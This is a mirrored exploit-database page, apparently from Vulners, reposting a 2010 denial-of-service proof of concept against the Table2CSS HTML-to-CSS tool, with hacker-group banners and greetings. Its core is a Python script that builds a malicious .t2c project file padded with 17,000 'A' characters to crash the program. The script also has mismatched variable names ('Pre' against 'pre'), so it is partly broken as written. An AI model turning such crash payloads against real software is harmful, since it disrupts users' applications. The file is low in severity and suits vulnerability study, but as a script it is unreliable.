Lucene search
K

Table2CSS Denial of Service PoC

🗓️ 06 Aug 2010 00:00:00Reported by SONiCType 
zdt
 zdt
🔗 0day.today👁 22 Views

Table2CSS Denial of Service PoC, August 5, 2010, Low critical level, converts HTML to tableless CSS, SEO tool for web page

Code
===============================
Table2CSS Denial of Service PoC
===============================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ###################################               1
0                    I'm SONiC member from Inj3ct0r Team               1
1                    ###################################               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name : Table2CSS ---Denial of Service  PoC

Date : August 5 ,2010

Critical Level :Low

vendor URL :?? http://www.table2css.com

#######################################################################################################


Author : ..::[ SONiC ]::.. aka ~the_pshyco~ <sonicdefence[at]gmail.com>

Special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,MA1201,D3aD F0x,Nishi,Bunny

Greetz to :iNj3cT0r.com, www.andhrahackers.com

#######################################################################################################
Description:

TABLE2CSS is a SEO tool that converts HTML pages with tables to tableless CSS code. It is invaluable if you want to :
Reduce the percentage of HTML markup in your pages and get a better search engine ranking.
Reduce the overall size of your web pages and even further improve your positioning in search engines.
Replace the complex table layout in your website with simpler, easily maintainable CSS code. 

#######################################################################################################
Denial of Service - PoC


junk = "A"*17000
Pre = '''<root><version>17</version><outputDir/><cssLocation>{FILE}.css</cssLocation>
          <pageWidth>1024</pageWidth><pageHeight>768</pageHeight><urls><url>'''
After = '''</url></urls></root>'''
payload = pre+junk+after
file = open("WTF.t2c","w")
file.write(payload)
file.close()
print('done!!')


###############################################################################################################

# ..::[ SONiC ]::.. aka the_pshyco



#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Aug 2010 00:00Current
7High risk
Vulners AI Score7
22